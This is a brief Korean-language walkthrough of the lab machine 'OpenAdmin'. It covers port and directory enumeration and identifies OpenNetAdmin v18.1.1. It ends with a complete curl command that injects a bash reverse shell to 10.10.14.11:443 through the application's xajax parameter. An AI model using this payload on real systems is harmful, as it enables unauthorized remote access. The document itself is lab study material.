OPENADMIN

Nmap

  • robot.txt, index.php, index.asp๋“ฑ์„ ํ†ตํ•ด ํ™•์žฅ์ž ๋ช…์„ ์ฐพ์Œ -> but ์—†๊ธฐ์— -x ์˜ต์…˜์„ ์‚ฌ์šฉํ•˜์ง€ ์•Š๊ณ  ๊ทธ๋ƒฅ Feroxbuster ๋Œ๋ฆผ

  • Port : 22(ssh), 80(http)

  • 80

    • ์šฐ๋ถ„ํˆฌ ๊ธฐ๋ณธ ํ™ˆํŽ˜์ด์ง€ -> feroxbuster ์‚ฌ์šฉํ•˜๋‹ˆ SieRRA๋ผ๋Š” ํŽ˜์ด์ง€ ๋ฐœ๊ฒฌ -> shierra๋Š” Colorlib(WordPress ๊ธฐ๋ฐ˜) ํ…œํ”Œ๋ฆฟ์„ ํ†ตํ•ด ๋งŒ๋“ค์–ด์ง

      • ๋„๋ฉ”์ธ Chriss Turner, Julie Smart, Maria Smith, Lore Papp-Dinea

      • Owl Carousel v2.3.4

      • Opennetadmin v18.1.1

    • Opennetadmin exploit ์‚ฌ์šฉ(47691.sh)

      • python3 -m http.server 80

      • ์‰˜ ํš๋“!

      • ๋ฆฌ๋ฒ„์Šค ์‰˜

        • curl -s -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;bash -c 'bash -i >%26 /dev/tcp/10.10.14.11/443 0>%261'&xajaxargs[]=ping" http ://10.10.10.171/ona/

Last updated